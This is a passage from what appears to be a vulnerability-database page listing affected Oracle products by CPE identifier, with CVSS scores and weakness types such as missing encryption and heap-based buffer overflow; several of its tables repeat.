oracle
|
cpe:2.3:a:oracle:application_express_administration:*:*:*:*:*:*:*:*
|
— | |
|
application_express_customers_plugin
oracle
|
cpe:2.3:a:oracle:application_express_customers_plugin:*:*:*:*:*:*:*:*
|
— | |
|
application_express_team_calendar_plugin
oracle
|
cpe:2.3:a:oracle:application_express_team_calendar_plugin:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.4.3.0.0:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:19.5.33:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:20.3.28:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:21.2.55:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:22.3.26:*:*:*:*:*:*:*
|
— | |
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.4:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:fusion_middleware_12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:*:*:*:*:*:*:*:*
|
— | |
|
oracle_secure_backup
oracle
|
cpe:2.3:a:oracle:oracle_secure_backup:*:*:*:*:*:*:*:*
|
— | |
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:*:*:*:*:*:*:*:*
|
— |
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
database_-_core
oracle
|
cpe:2.3:a:oracle:database_-_core:21.3-21.15:*:*:*:*:*:*:*
|
— | |
|
database_-_core
oracle
|
cpe:2.3:a:oracle:database_-_core:19.3-19.24:*:*:*:*:*:*:*
|
— |
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
database_-_core
oracle
|
cpe:2.3:a:oracle:database_-_core:21.3-21.15:*:*:*:*:*:*:*
|
— | |
|
database_-_core
oracle
|
cpe:2.3:a:oracle:database_-_core:19.3-19.24:*:*:*:*:*:*:*
|
— |
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
database_-_core
oracle
|
cpe:2.3:a:oracle:database_-_core:21.3-21.15:*:*:*:*:*:*:*
|
— | |
|
database_-_core
oracle
|
cpe:2.3:a:oracle:database_-_core:19.3-19.24:*:*:*:*:*:*:*
|
— |
CWE-311
- Missing Encryption of Sensitive Data
Affected products
Known affected
23 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.0.0.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data
oracle
|
cpe:2.3:a:oracle:goldengate_big_data:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_veridata
oracle
|
cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— | |
|
application_express_administration
oracle
|
cpe:2.3:a:oracle:application_express_administration:*:*:*:*:*:*:*:*
|
— | |
|
application_express_customers_plugin
oracle
|
cpe:2.3:a:oracle:application_express_customers_plugin:*:*:*:*:*:*:*:*
|
— | |
|
application_express_team_calendar_plugin
oracle
|
cpe:2.3:a:oracle:application_express_team_calendar_plugin:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.4.3.0.0:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:19.5.33:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:20.3.28:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:21.2.55:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:22.3.26:*:*:*:*:*:*:*
|
— | |
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.4:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:fusion_middleware_12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:*:*:*:*:*:*:*:*
|
— | |
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
23 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— | |
|
application_express_administration
oracle
|
cpe:2.3:a:oracle:application_express_administration:*:*:*:*:*:*:*:*
|
— | |
|
application_express_customers_plugin
oracle
|
cpe:2.3:a:oracle:application_express_customers_plugin:*:*:*:*:*:*:*:*
|
— | |
|
application_express_team_calendar_plugin
oracle
|
cpe:2.3:a:oracle:application_express_team_calendar_plugin:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.4.3.0.0:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.0.0.0:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:19.5.33:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:20.3.28:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:21.2.55:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:22.3.26:*:*:*:*:*:*:*
|
— | |
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.4:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data
oracle
|
cpe:2.3:a:oracle:goldengate_big_data:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_veridata
oracle
|
cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:fusion_middleware_12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:*:*:*:*:*:*:*:*
|
— | |
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— |
9.8 (Critical)
Affected products
Known affected
38 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:*:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:23.10:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:19.1.0.0.0-19.1.0.0.9:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph_mapviewer
oracle
|
cpe:2.3:a:oracle:spatial_and_graph_mapviewer:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.4.0.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_veridata
oracle
|
cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.13:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.9:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:23.3:*:*:*:*:*:*:*
|
— | |
|
sqlcl
oracle
|
cpe:2.3:a:oracle:sqlcl:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.3.0.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.12:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.8:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition22.3.4:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.9:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:21.4.2:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:22.2.0:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:23.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:*:*:*:*:*:*:*:*
|
— |
7.1 (High)
Affected products
Known affected
48 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
oracle_nosql_database
oracle
|
cpe:2.3:a:oracle:oracle_nosql_database:*:*:*:*:*:*:*:*
|
— | |
|
oracle_goldengate_studio
oracle
|
cpe:2.3:a:oracle:oracle_goldengate_studio:*:*:*:*:*:*:*:*
|
— | |
|
oracle_essbase
oracle
|
cpe:2.3:a:oracle:oracle_essbase:*:*:*:*:*:*:*:*
|
— | |
|
oracle_goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:oracle_goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.3.0.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.12:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.8:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition22.3.4:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.9:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:21.4.2:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:22.2.0:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:23.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:*:*:*:*:*:*:*:*
|
— | |
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:24.3.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data
oracle
|
cpe:2.3:a:oracle:goldengate_big_data:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_veridata
oracle
|
cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:*:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:23.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:23.3:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
sqlcl
oracle
|
cpe:2.3:a:oracle:sqlcl:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.0.0.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph_mapviewer
oracle
|
cpe:2.3:a:oracle:spatial_and_graph_mapviewer:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.4.0.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.13:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.9:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
39 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
sqlcl
oracle
|
cpe:2.3:a:oracle:sqlcl:23.4-23.5:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:24.3.0:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:21.4.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:*:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.3.0.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.1:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:*:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:23.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:23.3:*:*:*:*:*:*:*
|
— | |
|
sqlcl
oracle
|
cpe:2.3:a:oracle:sqlcl:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.12:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.8:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition22.3.4:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.9:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:22.2.0:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:23.1.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_veridata
oracle
|
cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph_mapviewer
oracle
|
cpe:2.3:a:oracle:spatial_and_graph_mapviewer:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.4.0.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.13:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.9:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— |
8.8 (High)
Affected products
Known affected
15 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:24.3.0:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
CWE-122
- Heap-based Buffer Overflow
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph_mapviewer
oracle
|
cpe:2.3:a:oracle:spatial_and_graph_mapviewer:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.4.0.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.13:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.9:*:*:*:*:*:*:*
|
— | |
|
goldengate_veridata
oracle
|
cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:*:*:*:*:*:*:*:*
|
— | |
|
